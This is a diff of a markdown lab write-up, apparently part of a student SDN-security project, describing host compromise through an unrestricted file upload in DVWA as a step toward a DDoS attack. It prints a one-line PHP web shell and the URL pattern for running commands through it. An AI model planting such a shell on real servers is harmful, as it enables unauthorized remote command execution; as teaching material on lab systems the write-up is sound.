ozeliurs/SDN-Security/papers/Anatomy of a DDoS Attack: From Host Infection to Service Denial.md

 ## Exploiting a Vulnerability (e.g., SQLi, RFIs)

 Poorly secured web applications can be exploited to compromise hosts.
-Remote File Inclusion (RFI) is a common vulnerability that allows attackers to include files from a remote server.
-This can be used to execute arbitrary code on the server and compromise the host.
+In this example, the web application allows us to upload files, which can be exploited to execute arbitrary commands on the server.

-By accessing `http://<WEBSERVER_IP>/DVWA/vulnerabilities/upload/` we have unrestricted upload capabilities.
-We can upload a PHP file that will be executed by the server.
+By uploading a PHP file (let's call it `exploit.php`) that allows command execution from the URL parameters, we can compromise the server and gain control over it.

 ```php
 <?php system($_GET['cmd']);?>
 ```

-This PHP file allows us to execute arbitrary commands on the server by passing them as a GET parameter.
-We can then access the file by visiting `http://<WEBSERVER_IP>/DVWA/hackable/uploads/<FILENAME>.php?cmd=<COMMAND>`.
-This allows us to execute arbitrary commands on the server.
+By accessing `http://<WEBSERVER_IP>/uploads/exploit.php?cmd=ls`, we see that the command `ls` is executed on the server and the output is displayed in the browser.

 # Launching the Attack